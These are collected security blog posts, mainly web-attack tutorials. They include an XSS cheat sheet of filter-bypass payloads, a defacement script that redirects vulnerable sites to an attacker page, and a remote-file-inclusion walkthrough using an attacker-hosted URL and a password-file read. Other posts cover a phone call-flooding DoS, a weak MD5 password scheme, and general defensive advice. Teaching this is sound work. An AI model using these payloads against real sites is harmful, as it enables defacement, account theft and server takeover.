10 System Admin Tools to Help You Secure Your Network

System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems? How are you going to maintain licensing compliance if you don’t know who has installed what from \software? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of PCAnyWhere and several of the web-based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI-based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes. Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source WireShark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good “sniffer” is key to helping secure and analyze systems. There is simply no way that’s more effective to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.

XSS attacks practical examples ~ Cross site Scripting Exploits

Hello BTS readers,  So far i explained about XSS attacks and risks of this vulnerability; also i have provided guide to setup your own pentesting lab(using dvwa) to practice XSS attacks.

Dvwa is limited to few xss methods.  You may curious to know more about the practical examples for the XSS attacks. eHackingNews will help you to know more about the latest XSS attacks.

The XSS Vulnerability section in the EhackingNews covers the latest XSS attacks submitted by Security Experts and GreyHat hackers. This will give you an idea about the xss attack.

Recent report from EHN: Ubuntu website is vulnerable to XSS attack.

Complete Cross site Scripting(XSS) cheat sheets : Part 1

I am just providing this XSS Cheat sheet after collecting the exploit-codes from hackers' techniques and different sites especially http://ha.ckers.org/xss.html .  This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters.  If you have any different cheat codes , please send your code.

Basic XSS codes:
----------------------------------

<script>alert("XSS")</script>

<script>alert("XSS");</script>

<script>alert('XSS')</script>

"><script>alert("XSS")</script>

<script>alert(/XSS")</script>

<script>alert(/XSS/)</script>

When inside Script tag:
---------------------------------

</script><script>alert(1)</script>
‘; alert(1);
')alert(1);//

Bypassing with toggle case:
--------------------------------------

 <ScRiPt>alert(1)</sCriPt>
  <IMG SRC=jAVasCrIPt:alert('XSS')>

XSS in Image and HTML tags:
---------------------------------------------

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 <IMG SRC=javascript:alert('XSS')>      

<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

Bypass the script tag filtering:
--------------------------------------------------

<<SCRIPT>alert("XSS");//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

Using String.fromCharCode function:
-----------------------------------------------------

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

You can combine the above mentioned codes and make your own cheat code.

Note:
We are extending the cheat sheet.  Soon we will publish the part 2.

Complete Cross Site Scripting(XSS) Guide : Web Application Pen Testing

Hello BTS readers, Here is complete set of posts that explains everything about the Cross site scripting.  Still more articles are on the way, Stay tuned to BreakTheSec..!


Link To Tutorials:

• Cross Site Scripting(XSS) Basics
• DOM Based XSS attack
• XSS Filter Bypass Techniques
• Self-XSS (Cross Site Scripting) :Social Engineering Attack and Prevention 
• XSS Cheat Sheet 
• XSS Attacks Examples
• Cookie stealing with XSS 
• Deface a website

PenTesting Lab to practice XSS attacks:

• Ethical Hacking Lab with Bodgeit App
• XSS Lab with DVWA web app

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSS and some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability?

Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!

Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>


Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>

Defacement Page with Pastehtml:

First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking

I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way.

Download this web Application from here:
http://www.dvwa.co.uk/

For Installing the this application, you will need XAMPP server.

The installation procedure :


Using this application , you can also practice:

• LFI /RFI (File Inclusion methods)
• Command Execution
• Upload Script
• Login Brute Force

if you have any doubts, check their wiki page or comment here.

Introduction to Vulnerability Assessment

What is Vulnerability Assessment? 
Vulnerability Assessment is the process that identifies and classifies the vulnerability in a system. The vulnerability are performed in various systems such as IT systems,nuclear power plants, water supply system,etc. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields.

The steps involved in Vulnerability Assessment:

• Classifying capabilities and assets(resources) in a system.
• Assigning quantifiable vaule and importance to the above resources.
• Identifying the vulnerability in each resources.
• Mitigating or eliminating the most serious vulnerabilities for the most valuable
• resources

Standard risk analysis is mostly interested in exploring and examining the risks surrounding a given asset or resource (in the IT industry's case, digital information, the continued smooth operation of a program, or the unimpeded performance of an OS or network) as well as its function and design. Such assessments tend to concentrate on the direct consequences and root causes for the failure of the scrutinized object.

In contrast, vulnerability assessment is more concerned with both the adverse effects on the asset itself and on the principal and secondary consequences for the surrounding system environment. At any rate, this analysis type is mostly focused on the possibilities of mitigating such risks and improving the security capacity and performance rating of a given network or computer system in order to better manage future incidents.

The vulnerability test is performed by an automated tools(Eg: joomla vulnerability scanner). These tools identify the vulnerabilities and give tips for mitigate or patching . But these tools are limited to common and known vulnerabilities. Vulnerability assessment can be done by inside professionals (i.e. network administrators), but is usually outsourced to Managed Security Service Providers (MSSP).

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Last time , I have explained about the Clickjacking attack and prevention.  Today,  i am going to explain about the Self-XSS(Cross Site Scripting) Attack

What is Self-XSS?

Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into paste the malicious code in browser.  Results in attacker accessing to the whatever website you visit. Usually scammers use this attack for tricking users to buy products or get money through online survey .

Recently, Hackers Attacked Facebook with explicit hardcore porn images. Facebook says it might be self-Xss Attack .

Javascript can be executed in browser url bar.
For example , enter the following code in your browser:

javascript:alert('BreakTheSecurity');

This will show a pop up box with "BreakTheSecurity".  An attacker can use this for malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and more.
For Eg:
Entering the following code will display the cookies in your browser:

javascript:alert("Cookies:"+document.cookies+"  "+"\n By \n BreakTheSecurity");

The above code is not going to anything maliciously other than displaying the cookies.  But an attacker can extend the script so that it can take advantage your data.

Security Tips from BreakTheSecurity:

• Use NoScript add on that will prevent javascript running in your browser.
• Don't click the shorthand urls for Example: bit.ly/55ewEb?22.  This may redirect to an infected sites. 

Aware of Social Engineering:

• If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never do this mistake.  
• If anyone says "Iphone only $10", Don't eager to click it. 
• If anyone says "1000 shares will cure a baby", Never do this mistake. Facebook shares never help to get money or help to cure baby.
• Read our EHN spam report to know the latest updates about the facebook scams.

God give us the Sixth Sense,Use it and think before you click any links or following the other instructions. 

Remote File Inclusion Vulnerability Tutorial~Web application Vulnerability

This is old tutorial but worth to read it. i write this article before 6 months but forget to post. So here i am posting it.

Remote file inclusion is one of web application vulnerability . Using this vulnerabilitiy an attacker can include their remote file such as Shell. This results in website defacement.

Shell is a GUI(Graphical User Interface) file that is used to browse remote files , using this shell you can run your own code on the victim web server.

By running malicious codes on the web server , an attacker take control of the Whole Server.

Using the vulnerability of the web application , an attacker can do:

•  Execute malicious codes
•  Denial of service
• Execute Cross Site Scripting (XSS)

When web application is vulnerable to File Inclusion?

The web application becomes vulnerable because of unvalidated external variables (such as $_POST,$_GET,$_COOKIE). The main vulnerability occurs because of "include" function. This "include( )" function get the another page and include as content in current page. If allow_url_fopen function is enabled in web application, an attacker can include the files remotely.

Let us look into some examples, Consider this PHP code.

<?php
$incfile=$_REQUEST['NewsFile'];
include($incfile. 'php');
?>

In this code, the second line "$incfile=$_REQUEST['News'] " gets input from HTTP Request (I mean the valued passed in URL ). The second line inlcudes the "NewsFile " dynamically.

For instance, consider this url:

http://vulnerablesite.com/index.php?NewsFile=news1

Here the news1 is passed to NewsFile variable. The above php code get the value of Newsfile variable using the $_REQUEST. $include function will include news1.php file in index page.

Here you have note one thing, the developer doesn't validate the the HTTP Request input. It causes to vulnerable. An attacker can change the value and launch the Remote file inclusion attack.

How an attacker use this vulnerability?

An attacker can use this vulnerability to inlcude his malicious files. For instance, he can change the value of Variable NewsFile in the url like this:

http://vulnerablesite.com/index.php?NewsFile=http://attackersite/malicous_code

now the vlaue of NewsFile= http://attackersite/malicous_code. So the include function will become like this:

include('http://attackersite/malicous_code.php');

This leads to include the attacker malicious codes in the victim site. Now the attacker can include any malicious codes and execute in the web server. Attacker will upload the shell code and gain the access to the remote files of the website.

Null Meta Character():

An attacker can upload the text files also. But how, It ends with .php in include function ? Using null meta chracter, attacker can eliminate the .php extension. For example by including the NewsFile value as: http://attackersite/malicous_code.txt. Here will eliminate the .php code. So now he can upload any type of files also.

By giving NewsFile vaule as =/etc/password, Attacker can read the contents of password file on UNIX system directory traversal.

Prevention over the RFI

• Disable the register_globals and allow_url_fopen and allow_url_include in PHP.ini file.
•  Validate the Use Input.

Shield Against Hacking With a Daily Anti-Malware Scan

Hacking; it's the fear of every website owner and it keeps many online business owners up at night, checking their website and servers, making sure they are still in control. It's scary, one day you are doing well and selling products, the next, you can't log into your website, you have profane images instead of product images, and you are being a virus spreader that most search engines block and that most browsers will keep visitors from getting to. This can take years to recover from, even after the virus is gone, but there is hope. Malware often take a while to really get into the system and cause damage, and like with a human virus, if it is stopped early you will not encounter these terrible effects.

What is hacking?
Hacking is a large culture that has a large number of methods and attacks to get around your security, sneak into your website and server, and change everything around. There are many ways of doing this, but it is commonly done through malware that is designated to consume files and strike at an inopportune moment.

The problem about this is that, until the virus strikes, you may not know anything is happening. Just like a human virus, it is consuming files (like cells) and will manifest effects when it is already too late. By the time you notice that you cannot login, or that weird things are happening on your website, it's already too late. You have been taken over, and there are many disastrous effects to this.

The most direct effect is that your website is ruined. Well, that can be fixed easily enough. The real trouble is your private information. Do you have any credit cards, passwords, private business files and other classified information that only your or other associates should see? Hacking is a common form of corporate espionage, which is why you may be targeted.

If you have 10+ years in Internet security, maybe you can handle this by yourself; however, most website owners do not have this experience. Instead, you can use computer support Sydney daily malware scans. What does this do for you? Everyday, the computer support Sydney company will scan all your website files for malware. Since the malware typically needs several days or longer to really affect the website, this allows you to get rid of the malware before you see anything happen.

Another benefit to a daily malware scan is that most of the infected code or file can be metaphorically sanitized, leaving you with a clean website free of digital germs. Not only that, but this malware scanner is updated daily with new malware formats, methods and strategies that hackers think up. Think of this as a doctor who learns more and more about his field, just this works much faster.

This can also easily scale up from beginning websites to enterprise sized monoliths. So if you are worried about size, either because you have a small or large website, don't even let that be a concern. Your entire website can be easily scanned and searched for malware, which will then be prompted removed so you can enjoy the freedom of a clean website without viruses.

No website, especially a business website, can live a successful online life without daily malware scanning. Hackers come in for fun to destroy websites with weak code, and corporate espionage will target any competitors that do not have appropriate online security. Don't be another hacked website, don't fall to this devastating online virus. Use a daily malware scanner, and keep those nasty germs away from your precious website.

Author:

Jacob Pettit
Marketing, GO8
jacob@go8.com.au

DoS (denial of service) attack on Mobile phones

As we are in this world influenced by information security, we as security professional have seen many kind of Dos and DDoS attacks happening around the world but what if any one DoS your daily communication Companion ? your mobile device ? and you are just unable to call or operate your phone in proper way ,not even listen to music or even videos ??

Some years back there was DoS possible on a Nokia Phone back in around 2003. but now there is a new way (at least i think so) for performing DoS attack on a Samsung Mobile Phone. Because of auto call reject functionality of the Samsung phones.

Auto call Reject functionality : this function of the Samsung phones is used to block any number to call u so when a person adds any number like xxxxxxxxxx to reject list and if xxxxxxxxxx calls that person ,so the call is automatically gets disconnected , and that number xxxxxxxxxx can not connect a call with you.

Example : if Bob has a Samsung mobile phone and if Bob adds Mak's mobile number to is auto reject list , so when Mak calls Bob it call gets disconnected in first call ring and Bob has just a missed call alert of Mak's call.

Its a nice function of Samsung mobile phones to block unwanted callers but as by the example the rejection function reject call but it shows a missed call alert of that blocked number. This is the main flow (Bug) which allow the DoS happening on the Samsung mobile phones.

Lets take the above example again , Mak's mobile number is in reject list of Bob's Samsung phone so when Mak calls Bob his call ends immediately and with a missed call alert on Bob's phone but if Mak calls Bob in a rate of just a few seconds then ?? - than it performs a DoS on Bob's Samsung mobile phone so if Mak calls Bob in seconds again and again by his phone's auto redial function than bob is unable to receive any on else calls because its going to show busy to that other caller calling Bob. even Bob can not do calls , can not listen to music ,videos or even capture photos because the phone continuously shows missed call alerts of Mak's calls.

It happens because of the missed call alert which takes long to go from the screen on the phone. so if Samsung adds a function like some Chinese phones - they just don't show any alert on the mobile screen and shows entries of blocked calls.

Anyone can just give missed calls to that mobile number for some time so when the user of that Samsung mobile phone adds the number to auto reject list than u can register on mobivox or similar service and just write a Autoit3 script or similar to give missed calls to the person to its a DoS on his Samsung Mobile.

Author : Ashish Mistry, Founder of Hcon
Information Security Researcher, Penetration Tester, Malware Researcher, Trainer

Find If A Website Is safe To Open or not using Online sites and Tools

In last post, we explained how to check if the site is safe or not using the McAfee Advisor.  Now i am going to introduce some other sites and tools for testing the site is safe to open or not.

Websites To check sites:

Norton Safeweb:
Norton Safeweb is free online application provided by Norton Security. It works same in way as McAfeeAdvisor.
You can check the site safety here:
http://safeweb.norton.com/

Google Safe Browsing:
Google safe browsing will analyze the site for malware.  It will also report the status of site in past months.
URL to Check:
www.google.com/safebrowsing/diagnostic?site=www.google.com
replace the www.google.com with your target site.

If you manually find any sites spreading malware, you can report here:
http://www.google.com/safebrowsing/report_badware/

AVG Link Scanner:

AVG Link Scanner is free tool that also works like a McAfeeAdvisor.

• Checks each web page in real time before it opens on your computer
• Automatically updates whenever a new threat is discovered 

Download it from here:
http://linkscanner.avg.com/

Don't forget to check your own site frequently. Attackers can inject malicious script in your site also.

What is Clickjacking Attack? How to Prevent? | UI Redressing

Will answering simple maths quiz delete your Social Network account?  If your answer is "No", then check this news Linkedin Clickjacking Vulnerability and come back.  Will visiting a website turn on your webcam? The answer is "Yes".  Check this Flash player clickjacking vulnerability.

If you read above news completely, It will be easy for you to understand  what is clickjacking.  Ok, lets continue to our Article.

Clickjacking also known as UI Redressing,is one of Malicious Technique tricking users to click the button/image that will run hidden malicious script from another site.

An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the innocuous page. Thus an attacker hijack the click to another website.  That's why it is known as Clickjacking(Click+Hijacking).  The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:

Lets take the real time example "Linkedin clickjacking vulnerability.

The above image may look like simple maths problem.  Once you click the submit button, it will delete your Linkedin account(if you are logged in) without asking any questions.

Clickjacking Attack can be used for:

• Tricking users to turn on their webcam and microphone using this adobe vulnerability (this security flaw fixed by adobe)
• Getting more Twitter Followers
• Post in your facebook wall.
• Can delete your profile.

Prevention Techniques:

Client Side(Security tips for users):

Flash Player:

Update your Flash Player(old version are vulnerable to Clickjacking). 

Browser Security Addons: 

Noscript:
Noscript is Mozilla add on that provides protection against clickjacking,XSS and other malicious scripts.  Noscript is available for mobiles also.

Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames

Server Side( For Developers)

Frame Killer:

Framekiller is javascript snippet that can be used in webpage  to avoid inserting frames from different sources.  This can provide security against frame based clikjacking.

How to Hide email address when sending mail to Multiple Recipients

Recently, i got mail from my Institute(where i learned Java) regarding the Interview. when i look into the To address, it includes other email address (including girls email address).  This is not big matter when you send mail within organization. What if suppose you send to others.

Just for fun:

Just imagine you have two girl friends.  Forwarding some interesting mail to both.  If anyone notice the To address, then you will end up in hospital. 

 If you like to hide email address from other recipients while sending to multiple recipients, this article will explain how to do.  I believe this will helpful for organization and those who concerned about Security.

How to do?
It is very simple.

Whenever you send mail to group of mails, fill the mail address in BCC field instead of To field (leave the To field empty).

BCC is expanded as Blind Carbon Copy.

The receiver will see sender and his address.
He can't see others address.

Could Your Bad Password Habits Come Back To Haunt You?

According to Business Insider, the CEO of a major social network used its trusted database of user passwords in order to hack into one of its user’s email accounts. The hack was based on the guess that this user probably accessed all of their accounts using the same password.

Although the cloud has provided us with some amazing new tools, it’s also created the need for increased end-user education and policy enforcement.

Yes, it’s true that nearly all cloud providers act ethically. They invest heavily in security as a means of protecting their reputations. But also, there are laws which strictly dictate how they must handle and protect their client data.

In fact, most data leaks and privacy breaches are the result of “insider jobs” by people who had physical access to the victim’s computer or storage media. (It would be much easier for me to steal your laptop from your home, than for me to break into Google’s datacenter and steal the hard drive that stores your Gmail content).  But it only takes one bad apple or one security leak to put your password into the wrong hands. And once that happens, then all of the other accounts which depend on this password will be compromised.

There are a number of ways that you can protect yourself from the possibility of having your password stolen in this manner.

One simple way would be to make use of sites which feature single sign-on (such as OpenID), or where a single login would let you access multiple services (like your Google account). There are also a number of specialized apps which let you manage multiple online accounts from a single interface.This has the advantage that your credentials are only stored in a single central repository. (Every time you make a copy of a password, the chances of a data breach go up).  Of course, this still leaves you open to a breach in the event that someone steals your password, but at least it makes such breaches more difficult. Also, such a breach might leave suspicious activity patterns that could get flagged and blocked. (ex: Many SaaS providers can block or flag access coming in from a anonymizing proxy)

The ideal scenario would be to have some sort of multi-factor authentication that requires access from a specified IP address. At the moment, only a few SaaS apps offer this ability.

If you choose to aggregate your credentials in this manner, you should only do so for low-priority online services. Any services that require the handling of sensitive information should have their own dedicated unique highly-random passwords.

Another method for managing multiple accounts using a single set of credentials would be to use a single password which is scrambled using a hint that is unique to the account in question. For example, a user whose password is “pUpp1e5” could combine this password with the web site name and create an MD5 hash where the first 10 characters would be the new password.  So the password+site string “pUpp1e5 salesforce.com” might hash to “50f49dd6f3f838fb74ca1b7de5898c48”. And the new password would be 50f49dd6f3.
But the absolute best way to prevent you passwords from being used against you would be to generate and memorize completely random passwords for every account you open. Although this takes a bit of discipline, it’s not as hard as it sounds.

Many people will rely on mnemonic systems which turn these passwords into easy-to-visualize sentences.
For example:
“Y!14gtP” could be turned into “Yolanda surprised 14 green turtles named Peter”
Although these mnemonic systems are ok for short-term memorization, I’ve found that their effectiveness is overrated. For a number of reasons - which would take too long to go into for this article – I find that there’s no substitute for good old-fashioned memorization through repetition.

Here is a technique that works for me.

• Step 1: Generate a random password and memorize it mnemonically or write it down somewhere safe. (Maybe an encrypted file)
• Step 2: Log in and out 5 times in a row to build muscle memory.
• Step 3: The next day, log in and out again 5 times using the new password.
• Step 4: One week later, log in and out again 5 times using the new password.

You can now go ahead and destroy the written or saved copy of the password. By this point, you should have the password memorized for life. (Or until you’re ready to change it again)
Now that we’re living in the “cloud age”, users need to be more aggressive than ever when it comes to maintaining effective password management habits.

About The Author:
For over ten years, Storagepipe has been providing online server backup services that help companies maintain the safety, security and confidentiality of their private data.

Certified Ethical Hacker(CEH) 312-50-v7 Practice Test from Ucertify

Ethical Hacking Tutorials Blog is introducing a new feature called Certification Preparation Showcase to introduce blog readers to certification preparation education providers and their products. This independent review will highlight the features available in the offerings so that blog readers are aware of the vendors. This blog does not endorse or recommend any specific vendor. Certification candidates should use their best judgment before buying any products or services reviewed on this blog. EC-Council Advisor hopes that Certification Preparation Showcase will assist blog readers in the evaluation of certification related products or services.


The first product which is being reviewed in the Cert Prep Showcase is uCertify PrepKit from uCertify LLC. The company has been offering certification preparation study kits for more than a decade. The current portfolio covers certification study material for leading companies such Microsoft, EC-Council, Cisco, IBM and others.

The certification preparation material is available as a download with a list of 15 questions diagnostic test available for free. If you have bought the kit, a license key will reach your e-mail inbox to activate the complete features of the kit. The exam PrepKit consists of a Test Engine with multiple simulated tests. For review purposes, I had downloaded 312-50-v7 Certified Ethical hacker V7 kit. There are 5 full-length practice tests and 1 'Final Test' to prepare oneself for the actual exams. One can also create a custom test and a fixed time test using the question bank in the test engine.

The test kit also provides nearly 300 flash cards, study notes and tips for taking the exam. The test kit covers all the sections mentioned in the exam content on the certification website. The test engine has been built to closely resemble the testing platform one would encounter for an actual exam. So preparing for a certification exam using the PrepKit will be a familiar experience on exam day. The best benefit of a Test PrepKit like this would be to use as a test simulation tool rather than a guide to learn concepts. There are several EC-Council Press and other publications available for reference guides.

EC-COUNCIL Advisor: Please tell us about your company. From when did you start offering EC-Council Certification prep kits?

Jon: uCertify is a leading training provider for the IT Certifications exams. For the past 15 years, uCertify has specialized in exam preparation solutions for all major certification exams, from vendors, such as Microsoft, EC-Council, Adobe, CompTIA, Cisco, EC Council and more. We are available 24 x 7 x 365. All uCertify PrepKits come with a 100% money back guarantee, which is the best in the business. Students pass in their first attempt using our prepkits, else we refund the cost of the prepkit. uCertify is committed to serving its customers with innovative, reliable, and high-quality products through constant research and development, keeping in mind the latest pattern of the various exams. We began offering our prepkits for EC-Council certifications back in 2003. Since then, we have continuously added to the EC-Council test prep suite keeping up with EC-Council’s certification offerings, including all Sun based prepkits.

EC-Council Advisor: When would you recommend a candidate to start using your prep kit?

Jon: We recommend that students begin using our prepkits as soon as possible. Our prepkits provides information about exam objectives, lots of study material and dozens of practice questions which not help reinforce concepts, but hones practice skills until they have achieved mastery of the subject.

EC-COUNCIL Advisor: Tell us how you develop the practice tests?

Jon: Our prepkits are crafted by industry experts from within uCertify, as well as from the field, They are typically certified professionals themselves, and are subject matter experts in the area of certification they are writing for. These professionals understand the problems that students face while preparing for their certification exams, and ensure that the prepkit material they author helps student pass their certification exam in their first attempts.

EC-COUNCIL Advisor: You advertise a very high success rate in certification exams (98% plus) for your customers. What makes that possible?

Jon: uCertify places a very high emphasis on content quality. Our content authors, be it in-house uCertify employees, or contracted IT professionals with relevant experience, are held to extremely high standards. In addition to stringent checklists and peer reviews, several prepkits are also reviewed by ProCertLabs, a company regarded by many certification vendors, as being very qualified to review a test prep provider’s work. Every piece of material in our prepkits is authored and reviewed via a strict checklist to ensure high quality standards.

EC-COUNCIL Advisor: What advise would you give to EC-Council certification candidates preparing for certification exams?

Jon: Practice, Practice, Practice! Invest in a high quality prepkit provider such as uCertify, and go through all study material, and take/retake the tests until they score 95% or higher in all the practice tests they take. Readers of EC-COUNCIL blog can use discount code: UCPREP when checking out and avail of a 10% discount. 

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.

It will be easy to understand XSS , if you have the following prerequisite:

• Strong Knowledge in HTML,javascript(Reference).
• Basic Knowledge in HTTP client-Server Architecure(Reference)
• [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.

View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
